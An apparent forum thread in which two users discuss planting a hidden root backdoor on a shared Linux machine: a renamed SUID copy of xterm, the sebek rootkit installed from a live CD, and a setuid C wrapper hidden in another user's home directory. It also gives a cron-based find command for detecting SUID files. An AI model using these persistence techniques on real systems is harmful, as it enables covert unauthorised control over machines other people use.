If you had physical access to a Linux machine

[Virchanza]

Let's say you have "restricted user" access to a Linux computer, the kind of user account that can't use "sudo".

If you had physical access to this machine for 10 minutes, what you tweak in it so that from that point on, you can always do whatever you want with it... without the knowledge of anyone else who uses the computer.

I was thinking I'd boot up a live CD or live USB of Linux. Then I'd navigate to "/usr/bin" on the hard disk and make a copy of the file "xterm", maybe name it something obscure like "params" so nobody would look at it twice. Then I'd set the SUID bit on this "params" file.

From that point on, I'd be able to boot up the PC as a "restricted user" and then just run "params" whenever I want a root terminal. And once I have a root terminal, I can do whatever I want

Any other ideas?

[Gitsnik]

Boot it up ( from live cd, mount -o rw /dev/blah ), install sebek, reboot it. Instant rootkit, forensicly capable, and it doesn't get caught by my nightly search-for-setuid.

[Virchanza]

Hey could you post the command you use to check your entire hard disk for programs that have the SUID bit set, I've been meaning to do this myself.

[Gitsnik]

Quote:

Originally Posted by Virchanza

Hey could you post the command you use to check your entire hard disk for programs that have the SUID bit set, I've been meaning to do this myself.

Sure can:

Code:

find / -perm -4000 -print | mail gitsnik

Run it as a cron job - I leave it up to you to figure out for GID.

Programs like rkhunter search this up, as does the FreeBSD security program each morning. I actually use a lot of badly hacked perl and a secured database on another server to do my checks (I'm a little paranoid on my internal LAN :P) because, of course, some programs are meant to be set uid.

[Virchanza]

I copied my "xterm" file and named it "params".

If I do the following:

Code:

ls -l /usr/bin/params

Then the output I get is:

Code:

-rwsr-xr-x 1 root root 332628 Oct 29 17:26 /usr/bin/params

However, when I actually run this program as a normal user, the XTerm program doesn't give me a root shell, it simply gives me a normal shell as a normal user. Why so?!

I've compared the permissions of this file with "sudo", and here's the permissions for "sudo":

Code:

-rwsr-xr-x 1 root root 115136 Feb 17  2009 /usr/bin/sudo

You'll notice that both files have exactly the same permissions, yet "sudo" obviously always runs as root.

Any idea what I'm doing wrong?

[Gitsnik]

Quote:

Originally Posted by Virchanza

Any idea what I'm doing wrong?

Try the same with copies of /bin/sh and /bin/csh. One should get you root, the other should not.

The reason varies, but it usually comes down to a getuid() variant which gets your actual username, rather than just your effective one. Check your C reference for the exact call (or man getuid). The idea is to get around the setuid bit and run as the normal user (programs like /bin/bash don't get used in most shellcode for this reason).

If, however, you wrote a quick wrapper program in C and kept it in your home directory (or, to annoy them, someone else's):

Code:

mkdir -p /home/enemy/.Remote/

you could have your own shell ready and waiting. This is still subject to the likely hood of detecting a setuid program with that find command.

Look at any ol' shellcode basics tutorial for a simple C program that executes /bin/sh, then modify that to do what you want (make it run /bin/xterm for e.g.) - so long as you don't make it setuid(getruid()) and drop the privs (assuming I got the function calls correct), it should let you run xterm's as root, or whoever. (Edit: subject to environment variables and such that pertain to X - this doesn't work on my BSD desktop without some setenv() tweaking in the C wrapper)